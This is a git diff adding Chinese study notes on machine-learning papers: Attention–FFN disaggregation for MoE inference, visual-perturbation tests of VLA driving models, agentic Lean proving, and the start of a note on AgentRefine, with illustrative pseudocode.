等方向都在做**节点内异构加速器**。AFD 天然匹配:**内存大的卡跑 Attention,算力强的卡跑 FFN**。 + +--- + +## 三层解耦:从粗到细 + +```text +Level 0 聚合(Aggregated) + 同一组 GPU 顺序跑 prefill + decode + attention + FFN + +Level 1 Chunked Prefill(如 Sarathi) + 把长 prefill 切块,与 decode 交错,减气泡 + +Level 2 P/D Disaggregation(如 Splitwise、DistServe) + Prefill 池 与 Decode 池 分开扩缩 + +Level 3 AFD(Attention–FFN Disaggregation) + Attention GPU 池 与 MoE-FFN GPU 池 分开扩缩 + 每层两次跨池通信:A2F(dispatch)、F2A(combine) +``` + +**本文结论的高频模式:** + +- **系统总吞吐(tokens/s)**:多数面板上 **聚合 + chunked prefill** 仍最强——因为全副本数据并行,并发高。 +- **用户交互性(tokens/s/user,延迟)**:**AFD 在所有评测面板上都赢**——Attention/FFN 比例可按负载调。 +- **长上下文 / 超大 prefix**:非 AFD 可能**不可行**;AFD 通过**权重分片 + KV 留在 Attention 侧**,把单卡峰值显存从约 **298 GiB 降到 ~165 GiB**(Qwen3-235B,1M prefix 案例)。 + +--- + +## 核心概念 + +### 1. AFD 的一层里四个流水线阶段 + +每层 MoE block 在 AFD 下被拆成四段(可 micro-batch 重叠): + +```text +[1] Attention 计算 @ Attention GPU 池 +[2] A2F / MoE-Dispatch @ 网络:fan-out,FFN 侧 ingress 易成瓶颈 +[3] MoE-FFN 专家计算 @ FFN GPU 池 +[4] F2A / MoE-Combine @ 网络:fan-in,Attention 侧 ingress 易成瓶颈 +``` + +非 AFD 时,dispatch/combine 只在参与 EP 的 GPU 之间对称交换;AFD 下变成 **M 个 Attention rank × N 个 FFN rank** 的**二分图全连接**(all-pairs),通信模式完全不同。 + +### 2. Attention : FFN GPU 比例 = Rate Matching(速率匹配) + +论文核心设计原则:**Attention 侧 GPU 只分配到「刚好跟得上 FFN 产出速率」为止**,其余 GPU 给 FFN。 + +影响因素: + +- **注意力机制成本**:MLA + 稀疏注意力(DeepSeek-V3.2)→ Attention 便宜 → 极端 FFN-heavy(如 **2A+126F** on 128 GPU agentic)。 +- **稠密 GQA + 长 KV**(Qwen3)→ Attention 变重 → 比例向 Attention 倾斜(如 **8A+120F**)。 +- **Mamba2 混合**(Nemotron3)→ 长 prefix 要传播状态 → 有时 Attention-heavy(**96A+32F**)。 + +这不是拍脑袋的 50:50,而是 **per-token attention 算力 + KV/state 显存** 与 **FFN matmul 吞吐** 的联立平衡。 + +### 3. Batch Overlap(BO)与四段 micro-batch 流水线 + +在全双工 NVLink / IB 上,AFD 可把 token budget 切成 **M 个 micro-batch**(M=4 对应四段流水线),让计算与通信重叠。稳态延迟近似: + +\[ +t_{\text{pipe}} = M \cdot s_{\max} + \sum_{i: s_i \neq s_{\max}} \frac{s_i}{L} +\] + +其中 \(s_{\max}\) 是瓶颈阶段(Attention、A2F、FFN、F2A 之一)的单 micro-batch 成本,\(L\) 是层数。AIC++ 用 AIConfigurator 实测小 batch 的 kernel 成本,避免「线性外推」失真。 + +### 4. 位置感知放置(Location-aware Placement) + +高频的 **层内 A2F/F2A**(每层每请求都发生)应压在 **节点内 NVLink(scale-up)**;较低频的 **跨节点 KV 搬运**(P/D 场景)走 **InfiniBand(scale-out)**。乱摆 GPU 会导致 scale-out 链路上 A2F/F2A 拥塞,抵消 AFD 收益。 + +### 5. AIC++:为什么需要「kernel 实测 + 网络仿真」 + +在 128 GPU 规模上暴力试几百种配置不现实。AIC++: + +1. 用 **AIConfigurator** 查表得到 Attention/FFN kernel 时间与显存; +2. 用 **AstraSim** 把 A2F/F2A 展开为**二分流量矩阵**,包级仿真拥塞; +3. 联合搜索 **TP / DP / EP / SP / PP + P/D + AFD 比例 + micro-batch 深度**。 + +--- + +## 代码示例 1:用配置结构表达 AFD 副本布局 + +下面用 Python 风格伪代码描述论文中的 **replica 配置搜索空间**(非论文原文,但对应 AIC++ DSE 的枚举逻辑): + +```python +from dataclasses import dataclass +from typing import Literal + +@dataclass +class AfdReplica: + """一个推理副本:M 张 Attention GPU + N 张 FFN GPU""" + attn_gpus: int # M + ffn_gpus: int # N + tp_attn: int + tp_ffn: int + ep_ffn: int # 专家并行度,通常 <= ffn_gpus + micro_batches: int = 4 # 四段 BO 流水线 + mode: Literal["agg", "pd_disagg", "afd", "pd_afd"] = "afd" + +def is_memory_feasible(cfg: AfdReplica, model, workload) -> bool: + """聚合 vs AFD 的 per-GPU 显存估算(论文 §4.1.3 思路)""" + W, A, K, N, O = model.weight_gb, model.act_gb, workload.kv_gb, 8, 12 + if cfg.mode in ("agg", "pd_disagg"): + m_shared = W + A + K + N + O + return m_shared <= model.gpu_hbm_gb + # AFD:权重/激活分到两侧,取较大者 + m_attn = model.attn_weight_gb + A + K + N + O + m_ffn = model.ffn_weight_gb + A + N + O + m_afd = max(m_attn, m_ffn) + return m_afd <= model.gpu_hbm_gb + +def rate_match_ratio(attn_cost_per_tok: float, ffn_cost_per_tok: float, + total_gpus: int) -> tuple[int, int]: + """粗粒度 Attention:FFN 比例(教学用,非闭式最优解)""" + # FFN 池大小 ∝ ffn_cost;Attention 只需跟上 FFN 发射速率 + ffn_share = ffn_cost_per_tok / (attn_cost_per_tok + ffn_cost_per_tok) + n_ffn = max(1, round(total_gpus * ffn_share)) + n_attn = total_gpus - n_ffn + return n_attn, n_ffn + +# 例:DeepSeek-V3.2 agentic — MLA+DSA 使 attention 极便宜 +cfg = AfdReplica(attn_gpus=2, ffn_gpus=126, tp_attn=1, tp_ffn=8, ep_ffn=126) +assert is_memory_feasible(cfg, model=DeepSeekV32(), workload=AgenticCoding()) +print(rate_match_ratio(attn_cost_per_tok=0.2, ffn_cost_per_tok=9.8, total_gpus=128)) +# → 约 (2, 126),与论文 DSE 最优同量级 +``` + +要点:**`is_memory_feasible`** 解释为何 1M prefix 下聚合模式 infeasible;**`rate_match_ratio`** 解释为何会出现反直觉的 2A+126F。 + +--- + +## 代码示例 2:单层 AFD 前向与 A2F/F2A 通信骨架 + +对应论文 §6.1 vLLM 原型:**router 在 Attention 侧**,M×N NCCL pair-group,FFN 只算本地专家分片: + +```python +import torch +import torch.distributed as dist + +class AfdMoELayer: + def __init__(self, attn_rank: int, ffn_rank: int, num_attn: int, num_ffn: int): + self.attn_rank = attn_rank + self.ffn_rank = ffn_rank + self.is_attn = ffn_rank is None + # 每个 (attn_i, ffn_j) 一对一个 NCCL group — 共 M*N 组 + self.pair_group = self._bootstrap_pair_group(attn_rank, ffn_rank) + + def forward_attn(self, hidden, router, shared_experts): + """Attention 侧:算 attention + 路由 + shared experts""" + x = self.attention(hidden) + topk_idx, topk_w = router(x) # [tokens, k] + shared_out = shared_experts(x) + partials = [] + for j in range(self.num_ffn): + payload = pack_dispatch(x, topk_idx, topk_w) # hidden + ids + metadata + if j == self.ffn_rank: + recv = payload + else: + recv = p2p_send_recv(payload, peer_ffn=j, group=self.pair_group[j]) + partials.append(recv) + # FFN 返回 partial 后 attention 侧 reduce + y = sum_partial_ffn_outputs(partials) + shared_out + return y + + def forward_ffn(self, recv_payload, local_expert_fn): + """FFN 侧:只跑本 rank 上的专家 shard""" + tokens = filter_tokens_for_local_experts(recv_payload, self.local_expert_ids) + out = local_expert_fn(tokens) + return p2p_send_recv(out, peer_attn=self.attn_rank, group=self.pair_group) + +def p2p_send_recv(tensor, peer, group): + """NCCL send/recv on bipartite link — A2F fan-out / F2A fan-in 的基础原语""" + if dist.get_rank() < peer: + dist.send(tensor, dst=peer, group=group) + return None + buf = torch.empty_like(tensor) + dist.recv(buf, src=peer, group=group) + return buf +``` + +论文强调:**MoE 路径上不应再有 FFN↔FFN collective**;所有跨 worker 流量都在 **Attention↔FFN 二分图** 上。生产向库如 **StepMesh** 也采用类似 P2P 拓扑。 + +--- + +## 评测结论速查 + +### SLO 严格时:只有 AFD 能「活下来」 + +Figure 2:DeepSeek-V3.2 @ 128 B200,Chat/Coding/Agentic 分别要求 TTFT < 50/100/150 ms、TPOT ≤ 15 ms。非 AFD 搜索结果为 **infeasible(红叉)**;**Agg+AFD** 或 **P/D+AFD** 可达约 **4k tokens/s**。 + +### 吞吐 vs 交互性的 Pareto 前沿(Figure 5) + +| 优化目标 | 常胜策略 | 原因 | +|----------|----------|------| +| **系统总吞吐** | 聚合 + chunked prefill,多副本 8 GPU EP | 全模型副本并行吞请求 | +| **单用户延迟 / 交互性** | AFD + micro-batch overlap | 独立定标 M:N,削瓶颈等待 | +| **超长上下文** | Agg+AFD 或 P/D+AFD | 显存分片 + BO | + +### 长上下文案例(Figure 6,Qwen3-235B @ B200) + +- **ISL=500k, OSL=10k**:最优 **Agg+AFD M4**,128 GPU 约 **2693 tok/s**,布局 **28A+4F**(7:1 Attention-heavy,长 prefill 吃 Attention)。 +- **Prefix=1M, ISL=4k, OSL=500**:非 AFD **不可行**(~298 GiB > 180 GiB);AFD ~165 GiB 可放下,128 GPU 上 **Disagg+AFD** 略胜。 + +--- + +## 与其他工作的关系 + +| 工作 | 关系 | +|------|------| +| [MegaScale-Infer (2504.02263)](https://arxiv.org/abs/2504.02263) | 字节跳动;提出 disaggregated expert parallelism + ping-pong pipeline;本文在其上系统量化 **何时 AFD + P/D + 并行策略叠加** | +| [PagedAttention / vLLM (2309.06180)](https://arxiv.org/abs/2309.06180) | KV 分页;本文 AFD 原型基于 vLLM,PR #29772 | +| [DistServe / Splitwise](https://arxiv.org/abs/2401.09670) | P/D 解耦基线 | +| [Theoretically Optimal Attention/FFN Ratios (2601.21351)](https://arxiv.org/abs/2601.21351) | 互补理论工作:闭式 A/F 比例;本文用大规模 DSE + 网络仿真验证多模型多负载 | +| [AIConfigurator (2601.06288)](https://arxiv.org/abs/2601.06288) | AIC++ 的算力建模底座 | + +--- + +## 设计原则清单(给工程师的备忘) + +1. **先问优化目标**:要集群吞吐还是单用户延迟?前者多副本聚合;后者考虑 AFD。 +2. **再画 workload 三角**:ISL、OSL、prefix/KV 复用率——RAG 大 prefix 与 coding 长 ISL 走不同分支。 +3. **按模型调 A:F**:看 attention 类型(MLA、GQA、Mamba)比看参数量更重要。 +4. **通信放对层**:A2F/F2A 贴 NVLink;别把层内高频流量赶到 IB 上。 +5. **开 micro-batch overlap**:四段流水线在全双工链路上才有意义。 +6. **显存预算单独算**:`max(M_attn, M_ffn)` 而非 `M_shared`——这是长上下文可行性的关键。 +7. **接受更低并发**:每个 AFD 副本占 M+N 张卡,总吞吐不一定赢聚合,但**延迟和可行性**可能赢。 + +--- + +## 局限与未来工作 + +- 集群结果主要是 **AIC++ 建模 + TensorRT-LLM 实测成本**,非全线上的端到端生产 trace。 +- 评测集中在 **B200 + FP8 MoE**;其他加速器、NPU、Groq 类异构节点需扩展 AIC++。 +- **AFD 不是默认最优**;盲目全集群 AFD 会浪费 GPU 并发。论文价值在于**可决策的边界**,而非「一律拆」。 + +--- + +## 一句话总结 + +**MoE 推理的瓶颈在 Attention(内存/KV)与 FFN(算力/专家通信)之间来回切换;AFD 让你像调配前台与后厨人数一样独立扩缩两侧 GPU。解耦可以走很远——远到让 1M prefix 的 Qwen3 从「装不下」变成「能服务」——但在多数吞吐导向场景,粗粒度聚合仍是最划算的;AFD 的主场是严格延迟 SLO 与长上下文 Agent 负载。** + +--- + +## 延伸阅读 + +- 论文 HTML:[arXiv:2605.28302](https://arxiv.org/html/2605.28302v1) +- vLLM AFD PR:[vllm-project/vllm#29772](https://github.com/vllm-project/vllm/pull/29772) +- StepMesh(AFD 通信库):[stepfun-ai/StepMesh](https://github.com/stepfun-ai/StepMesh) +- 本库相关笔记:[megatron-core-moe-2026](/docs/papers/megatron-core-moe-2026)、[paged-attention-vllm](/docs/papers/paged-attention-vllm)、[expertflow-moe-offload](/docs/papers/expertflow-moe-offload) diff --git a/src/content/docs/papers/agent-skill-protocol-2026.md b/src/content/docs/papers/agent-skill-protocol-2026.md new file mode 100644 index 000000000..6381de9b4 --- /dev/null +++ b/src/content/docs/papers/agent-skill-protocol-2026.md @@ -0,0 +1,229 @@ +--- +title: "VLA 驾驶模型的视觉依赖诊断——用扰动实验回答一个问题:自动驾驶到底在多大程度上真的在"看"?" +来源: https://arxiv.org/abs/2605.31041 +日期: 2026-06-13 +分类: 机器学习 +子分类: 模型与训练 +provenance: pipeline-v3 +--- + +# VLA 驾驶模型的视觉依赖诊断 + +> 论文:*Does Visual Information Play a Decisive Role in Vision-Language-Action Model Driving Behavior?* +> 作者:Jingtao He, Hongliang Lu, Xiaoyun Qiu, Yixuan Wang, Xinhu Zheng(港科大广州) +> 发表于 ITSC 2026 + +--- + +## 一、一个日常类比:蒙眼司机 + +想象你是一名出租车司机。 + +正常情况下,你看得到红绿灯、行人、前车,然后踩油门或刹车。这叫**端到端感知-决策**。 + +现在,我们给这位司机做几个实验: + +1. **遮住眼睛**(移除图像输入),只靠他之前几秒的驾驶记忆和方向盘角度来继续开车——他会往哪边走? +2. **给他一副模糊眼镜**(降低图像分辨率),他能辨认红绿灯吗? +3. **把他熟悉的街道照片打乱顺序**(破坏空间结构),他还认得路吗? + +这篇论文要做的事情就是:**系统地给 VLA 驾驶模型做这类"蒙眼实验",看看它到底在多大程度上真的依赖视觉信息。** + +--- + +## 二、核心问题:模型性能高 = 真的在看吗? + +目前评测 VLA 模型(视觉-语言-动作模型)时,大家主要看两个指标: + +- **轨迹误差**:模型预测的路径离真实路径有多远 +- **碰撞率**:模拟驾驶中撞了多少次 + +但这里有一个陷阱:**即使模型在干净输入上表现很好,也不代表它真的"看懂"了画面。** 它可能只是记住了训练数据里的统计规律,比如"前方有车道线就直行",而并没有真正理解场景中的语义内容。 + +这就好比一个学生考试考了高分,但我们不知道他是真的理解了题目,还是只是背下了答案。 + +这篇论文的核心问题是: + +> **VLA 驾驶模型的行为,究竟在多大程度上由视觉输入驱动?** + +--- + +## 三、方法:三级扰动框架 + +作者提出了一个**结构化多级视觉扰动框架**,把"破坏视觉信息"这件事分成三个由浅入深的层次: + +### 3.1 通道级扰动(Channel-Level)——最低级 + +直接在像素层面破坏图像,不改变场景的整体布局: + +- **高斯替换(Gaussian Replacement)**:把整张图替换成随机噪声图 +- **图像移除(Image Removal)**:完全不给模型看图,只用文字和历史状态 + +这相当于"蒙住司机的眼睛"。 + +### 3.2 信息级扰动(Information-Level)——语义密度 + +保持图像的粗略空间结构,但减少其中的语义信息量: + +- **下采样**:把图缩小再放大,丢失细节 +- **随机 Token 剪枝**:随机丢弃图像编码后的一部分特征 +- **FastV 剪枝**:按重要性评分,丢弃不重要的 Token + +这相当于"让司机戴模糊眼镜"。 + +### 3.3 结构级扰动(Structure-Level)——空间组织 + +保留所有视觉信息,但打乱它们的空间排列关系: + +- **全局打乱**:把所有图像 Token 随机打乱顺序 +- **位置打乱**:只打乱位置编码,Token 本身不变 +- **分块打乱**:把图像切成小块,每块内部不变,块之间随机交换 + +这相当于"给司机一张照片碎片拼图,但拼错了"。 + +--- + +## 四、核心概念详解 + +### 4.1 什么是 VLA 模型? + +VLA = **Vision-Language-Action**(视觉-语言-动作) + +它是一个端到端模型,输入是摄像头图像 + 文本指令 + 车辆状态,输出是直接的控制指令(如转向角度、加速度)。 + +与传统自动驾驶不同,传统方法把感知、预测、规划拆成三个独立模块;VLA 把它们合并成一个统一的多模态模型。 + +### 4.2 什么是 Open-Loop 和 Closed-Loop? + +- **Open-Loop(开环)**:给定一段固定视频,模型预测未来轨迹,和真实轨迹对比。**模型的行为不会改变后续帧的画面。** +- **Closed-Loop(闭环)**:模型在模拟器中实时驾驶,它的每一个决策都会影响下一帧的画面。**更接近真实驾驶场景。** + +关键发现:**同一个模型在两种设置下的视觉依赖程度完全不同。** + +### 4.3 依赖度计算公式 + +论文定义了一个简单的相对性能变化公式: + +``` +D(T) = (M(扰动后的结果) - M(原始结果)) / |M(原始结果)| +``` + +其中 M 是评测指标(如 L2 误差或 NCAP 安全评分),D 越大说明模型越依赖被扰动的视觉信息。 + +--- + +## 五、代码示例 + +### 5.1 扰动框架伪代码 + +论文中的算法流程可以这样理解: + +```python +# 输入:VLA 模型 f_θ,评测基准 B,评测函数 M,扰动族 T +# 扰动族分为三个层级:通道级(T_ch)、信息级(T_inf)、结构级(T_str) + +# Step 1: 计算干净输入的基准性能 +baseline_score = M( f_θ(clean_image, state_info) ) + +# Step 2: 遍历每个扰动层级 +for level in [channel, information, structure]: + for perturbation in T[level]: + # 构造扰动后的视觉表示 + perturbed_image = perturbation(clean_image) + + # 用扰动后的输入重新评测 + perturbed_score = M( f_θ(perturbed_image, state_info) ) + + # 计算相对性能变化(依赖度) + dependency = (perturbed_score - baseline_score) / abs(baseline_score) + + print(f"扰动类型: {perturbation.name}") + print(f" 依赖度: {dependency:.2%}") +``` + +### 5.2 具体扰动操作示例 + +```python +import torch +import torchvision.transforms as T + +def gaussian_replacement(image, mean=0.0, std=1.0): + """通道级扰动:用高斯噪声替换原始图像""" + b, c, h, w = image.shape + noise = torch.randn_like(image) * std + mean + return noise + +def image_downsample(image, ratio=0.5): + """信息级扰动:下采样再上采样,丢失细节""" + small_h, small_w = int(h * ratio), int(w * ratio) + small = torch.nn.functional.interpolate(image, size=(small_h, small_w), mode='bilinear') + restored = torch.nn.functional.interpolate(small, size=(h, w), mode='bilinear') + return restored + +def token_pruning(tokens, keep_ratio=0.5): + """信息级扰动:随机丢弃部分视觉 Token""" + b, seq_len, dim = tokens.shape + num_keep = int(seq_len * keep_ratio) + indices = torch.randperm(seq_len)[:num_keep] + return tokens[:, indices, :] + +def global_shuffle(tokens): + """结构级扰动:全局打乱 Token 顺序""" + b, seq_len, dim = tokens.shape + shuffled_indices = torch.randperm(seq_len) + return tokens[:, shuffled_indices, :] + +def block_shuffle(tokens, block_size=4): + """结构级扰动:分块打乱""" + b, seq_len, dim = tokens.shape + num_blocks = seq_len // (block_size * block_size) + blocks = tokens.reshape(b, num_blocks, block_size * block_size, dim) + block_indices = torch.randperm(num_blocks) + return blocks[:, block_indices, :, :].reshape(b, seq_len, dim) +``` + +--- + +## 六、关键发现 + +### 发现 1:开环 vs 闭环,结果完全不同 + +| 扰动类型 | 开环轨迹误差变化 | 闭环安全评分变化 | +|---------|-----------------|-----------------| +| 高斯替换 | +3.9%(很小) | -5.4%(中等) | +| 图像移除 | +7.1%(很小) | -14.6%(较大) | +| 下采样 90% | +2.6%(很小) | -31.5%(很大!) | + +**开环**(只看预测轨迹准不准)中,即使完全不看图,模型表现也只下降不到 10%。 + +但**闭环**(真实模拟驾驶)中,同样的扰动会导致安全评分大幅下降——**真实交互中,视觉的重要性远比开环测试揭示的高得多。** + +### 发现 2:语义比细节更重要 + +下采样(破坏语义形成阶段)造成的损害,远大于剪枝编码后的 Token(破坏已经形成的语义特征)。这说明模型在**交互控制**中依赖的是**高层语义**,而非原始像素细节。 + +### 发现 3:空间结构很关键 + +位置打乱(打乱 Token 的位置编码)造成的损害比内容打乱更大,说明**空间索引对视觉-语言对齐至关重要**。Transformer 模型中的位置编码机制在自动驾驶中扮演了重要角色。 + +--- + +## 七、为什么这篇论文值得读? + +1. **方法论价值**:提出的三级扰动框架不局限于 VLA 模型,可以推广到其他多模态系统的可解释性分析 +2. **安全警示**:开环评测可能严重低估模型对视觉的依赖程度,自动驾驶的安全评估需要更多闭环测试 +3. **设计指导**:告诉模型设计者——与其堆砌视觉细节,不如确保高层语义和空间结构的正确建模 + +--- + +## 八、一句话总结 + +> **VLA 驾驶模型在"纸上谈兵"(开环评测)时看起来不怎么需要视觉,但在"真刀真枪"(闭环驾驶)时,视觉信息尤其是语义内容和空间结构,对安全至关重要。** + +--- + +## 延伸阅读 + +- Impromptu-VLA 原始论文:arXiv:2505.23757 +- nuScenes 自动驾驶数据集:CVPR 2020 +- FastV 高效视觉语言模型推理:ECCV 2024 diff --git a/src/content/docs/papers/agentic-proving-for-program-verification-arxiv-2605-23772.md b/src/content/docs/papers/agentic-proving-for-program-verification-arxiv-2605-23772.md new file mode 100644 index 000000000..9b0b91628 --- /dev/null +++ b/src/content/docs/papers/agentic-proving-for-program-verification-arxiv-2605-23772.md @@ -0,0 +1,191 @@ +--- +title: Agentic Proving for Program Verification +来源: https://arxiv.org/abs/2605.23772 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# Agentic Proving for Program Verification — 学习笔记 + +## 一句话总结 + +这篇论文研究的是:让 AI 代理(Claude Code)像数学家一样,不仅"写出程序",还要"证明程序是对的"。 + +## 日常类比:餐厅厨房的质检员 + +想象你是一家餐厅的老板: + +- **写代码** = 厨师做一道菜 +- **程序验证** = 质检员检查这道菜是否完全符合菜谱 + +传统方式:质检员只能看"菜做完了没有"。 + +这篇论文的做法:让 AI 同时当厨师 AND 质检员——它先自己写菜谱(规格),再做菜(实现),最后还给自己写的菜谱和做的菜出一份"合格证明"。 + +而且这个 AI 很诚实:如果发现菜谱本身有 bug,它会说"这道题的菜谱写错了,我证明不了"。 + +## 核心概念拆解 + +### 1. 形式化验证 (Formal Verification) + +传统编程中,我们用"跑一下看结果对不对"来测试代码。形式化验证更进一步:用数学逻辑严格证明代码对所有输入都正确。 + +就像你在做数学题——不仅要算出答案,还要写出完整的证明过程。 + +``` +伪代码类比: +普通测试:assert square_root(4) == 2 +形式化证明:∀x ≥ 0, result * result = x ∧ result ≥ 0 +``` + +### 2. Lean 4 定理证明器 + +Lean 4 是一种"机器可读的数学语言"。你把程序规范和证明用 Lean 写出来,它会像一个极其严格的编译器——连一个括号错误都不能放过。 + +```lean +-- 这是一个 Lean 4 的规范示例: +-- 描述一个"返回列表最大值"的函数 + +theorem max_correct (lst : List Int) : + -- 前提:列表不能为空 + lst.length > 0 → + -- 结论:返回值一定是列表中的某个元素,且大于等于所有其他元素 + ∃ m, m ∈ lst ∧ ∀ x ∈ lst, x ≤ m +``` + +注意:上面这段是**规范**(specification),不是代码实现。它只说了"最大值应该满足什么条件",没说是怎么算出来的。 + +### 3. Agentic Proving(代理式证明) + +传统方式:人写规范,人写代码,人写证明。 + +这篇论文的方式:AI 代理(Claude Code)自己完成三步: + +``` +Step 1: Spec Generation → AI 读自然语言描述,写出形式化规范 +Step 2: Implementation → AI 根据规范写出代码实现 +Step 3: Proof Generation → AI 证明实现满足规范 +``` + +整个过程有一个"编译器在环"(compiler-in-the-loop):AI 每写一段就编译,报错就自己改,直到通过。 + +## 论文的实验与发现 + +### 实验设置 + +- **数据集**:CLEVER 基准,161 个编程问题(改编自 HumanEval) +- **AI 模型**:Claude Opus 4.6 + Claude Code 代理 +- **工具**:lean-lsp-mcp(搜索定理库)+ lean4-skills(Lean 专用技能包) + +### 关键数据 + +| 任务 | 成功率 | 说明 | +|------|--------|------| +| 生成规范 | 98.8% | AI 写出了合理规范 | +| 规范等价证明 | 81.3% | 规范与参考答案语义等价 | +| 实现+证明 | 87.5% | 基于正确答案中的规范 | +| 端到端(全流程) | 98.1% | 规范+实现+证明全部通过 | + +### 重要发现:基准测试本身有 bug + +AI 在实验中发现 CLEVER 数据集的 80/161 个问题的参考答案规范有 bug。这就像学生考试时发现试卷出题有误——AI 会主动报告,而不是瞎猜一个答案。 + +常见的 bug 类型: +- 用"且"代替了"如果"(逻辑表达错误) +- 运算符优先级搞错 +- 对无效输入做了没有意义的断言 +- 完全误解了题目要求 + +## 代码示例深入 + +### 示例 1:规范生成(Spec Generation) + +假设题目描述是:"写一个函数,反转列表"。 + +自然语言描述: +```python +def reverse_list(lst): + """Reverse the order of elements in a list.""" +``` + +AI 生成的 Lean 4 规范(形式化): +```lean +theorem reverse_spec (lst : List α) : + -- 反转后的列表长度为原列表长度 + (reverse lst).length = lst.length ∧ + -- 反转后的列表的第 i 个元素, + -- 等于原列表的倒数第 i 个元素 + ∀ i < lst.length, + reverse lst [i] = lst [lst.length - 1 - i] +``` + +这就是把一句人话"反转列表"翻译成了机器可验证的数学声明。 + +### 示例 2:实现与证明(Implementation + Proof) + +继续上面的例子。 + +AI 生成的实现: +```lean +def reverse_impl (lst : List α) : List α := + lst.foldl (fun acc x => x :: acc) [] +``` + +AI 生成的证明(简化版): +```lean +theorem reverse_impl_correct (lst : List α) : + reverse_impl lst = lst.reverse := by + -- 用数学归纳法证明 + induction lst with + | nil => + -- 基本情况:空列表反转还是空列表 + simp [reverse_impl, reverse] + | cons hd tl ih => + -- 归纳步骤:假设 tl 的 reverse 是对的 + -- 证明 hd :: tl 的 reverse 也是对的 + simp [reverse_impl, reverse, ih] + -- 这里需要一些辅助引理来处理 cons 操作 + sorry -- 实际证明会很长 +``` + +这个证明的核心思路是**数学归纳法**:先验证空列表的情况,然后假设"较短的列表正确",推导出"再加一个元素也正确"。 + +### 示例 3:AI 自我诊断 + +当规范本身有 bug 时,AI 的输出示例: + +```lean +-- AI 的反馈(非 Lean 代码,是自然语言分析): +-- Problem 123 (Collatz iterator): +-- 此问题的规范存在根本性缺陷。 +-- 规范声称迭代最终会回到 1, +-- 但这正是尚未被证明的 Collatz 猜想。 +-- 因此无法构造有效的正确性证明。 +-- 分类:issue(基准测试本身有错误) +``` + +这种"知道自已不知道"的能力,恰恰是 Agentic Proving 相比传统自动化定理证明的关键优势。 + +## 论文的几个重要结论 + +1. **编译器在环的代理范式目前最强** —— 让 AI 边写边编译、边报错边改,比一次性生成整个证明更有效。 + +2. **现有基准测试不够难了** —— 像 CLEVER 这种专门为挑战 AI 设计的测试集,现在 AI 几乎能满分通过。这意味着基准测试需要重新设计。 + +3. **等价位评分有问题** —— 目前评测规范质量的方法(看 AI 写的规范是否与参考答案"等价")有结构性缺陷。因为自然语言描述本身有歧义,参考答案只是"其中一种解读",AI 给出另一种同样合理的解读就不该被判错。 + +4. **AI 的自我诊断能力可靠** —— 人工审查确认 AI 对失败原因的分类和论证都是准确的。 + +## 对我(零基础学习者)的启发 + +这篇论文其实展示了一个有趣的范式转变: + +- **过去**:程序验证 = 专家花几个月手动证明程序正确 +- **现在**:AI 代理可以在几分钟内自动生成规范、实现和证明 +- **未来**:也许每个程序员都能让 AI 为自己的代码写形式化证明 + +但论文也提醒我们:AI 不是万能的。它发现基准测试本身的 bug 时,需要人工确认;它生成的规范与参考答案不等价时,需要判断哪一个是"正确的解读"。这些仍然需要人类的专业判断。 + +就像上面餐厅的类比:AI 可以做大部分质检工作,但最终"这道菜该是什么味道"的定义权,还在厨师(你)手里。 diff --git a/src/content/docs/papers/agentrefine.md b/src/content/docs/papers/agentrefine.md new file mode 100644 index 000000000..b8ee0fcb3 --- /dev/null +++ b/src/content/docs/papers/agentrefine.md @@ -0,0 +1,339 @@ +--- +title: "AgentRefine 学习笔记:通过修正微调增强智能体泛化能力" +来源: https://arxiv.org/abs/2501.01702 +日期: 2026-06-13 +分类: 机器学习 +子分类: 智能体 +provenance: pipeline-v3 +--- + +# AgentRefine:通过修正微调增强智能体泛化能力 + +## 一、日常类比:为什么"会改错"比"背答案"更重要 + +想象你让一个学生做数学题。传统的训练方式是给他 100 道一模一样的练习题,他背下了答案和步骤——这就是"记忆"。考试时如果题目完全一样,他能满分;但题目稍微变一下数字或问法,他就懵了。 + +AgentRefine 的核心理念是:**与其让学生背答案,不如让他学会从错误中改正**。 + +具体做法是: + +1. 给学生出一道新题 +2. 他先做一次(可能会犯错) +3. 老师指出错误原因 +4. 学生根据反馈修正自己的做法 +5. 重复这个过程 + +关键洞察是:**修正错误的过程本身,就是在学习**。模型不是记住了"看到 A 就选 B",而是学会了"当我看到结果不对时,我应该反思并调整"。 + +这就像程序员调试代码——你不需要背诵每种错误的修复方法,你学会的是"读错误信息 -> 理解哪里出了问题 -> 修正代码"这个通用能力。 + +## 二、背景与问题 + +### 2.1 LLM 智能体的"记忆"困境 + +大语言模型(LLM)作为智能体的核心控制器,已经在复杂任务中展现了类人能力(如 AutoGPT、BabyAGI 等项目)。开源模型(如 LLaMA、Mistral)正在成为商业模型(GPT-4)的有力替代。 + +许多研究通过**指令微调**(instruction tuning)来提升开源模型的智能体能力。方法是在特定任务数据上训练模型,让它学会"思考-行动-观察"的循环(即 ReAct 范式)。 + +### 2.2 核心问题:泛化能力差 + +研究团队发现了一个关键现象: + +| 评估类型 | 定义 | 现有方法的表現 | +|---------|------|--------------| +| **Held-in**(训练环境内) | 测试环境与训练数据来自同一环境 | 表现满意 | +| **Held-out**(训练环境外) | 测试环境是完全没见过的新环境 | **表现很差** | + +以 Agent-FLAN 为例:它在 AlfWorld 环境训练后,在 AlfWorld 测试集(held-in)上成功率为 67.2%,但在其他新环境(held-out)如 SciWorld 上的成功率只有 1.1%。 + +**问题根源**: +- 模型**过拟合**了少数几个手工设计的智能体环境 +- 模型只记住了"观察-动作"的对应关系,而不是学会如何应对新情况 +- 遇到错误时,模型会反复犯同一个错误,无法从反馈中学习 + +## 三、核心概念:修正微调(Refinement Tuning) + +### 3.1 核心思想 + +AgentRefine 提出了一种名为**修正微调**(Refinement Tuning)的新方法。其核心思想是: + +> **让模型学会通过观察环境反馈来修正自己的错误行为。** + +用一个类比:传统微调教模型"怎么走是对的",修正微调教模型"走错了怎么回头、怎么调整方向"。 + +### 3.2 数据构造流程 + +AgentRefine 的数据生成包含三个步骤: + +``` +Step 1: 生成场景脚本 (Script Generation) + ↓ +Step 2: 生成交互轨迹 (Trajectory Generation) + ↓ +Step 3: 验证与过滤 (Verification) +``` + +#### 第一步:生成多样化的场景 + +研究团队使用了丰富的"人设数据"(persona data),涵盖各种职业角色和个人兴趣,让生成的环境多样化。每个场景脚本包含: + +- **环境初始状态**:场景里有什么、在哪里 +- **目标**:玩家需要完成什么 +- **可用动作**:玩家可以做什么 +- **完成条件**:如何判断任务完成 + +例如,一个场景可能是:"一个刚加入 IT 部门的新人需要学习 UNIX 系统管理"。 + +#### 第二步:生成包含错误的交互轨迹 + +强 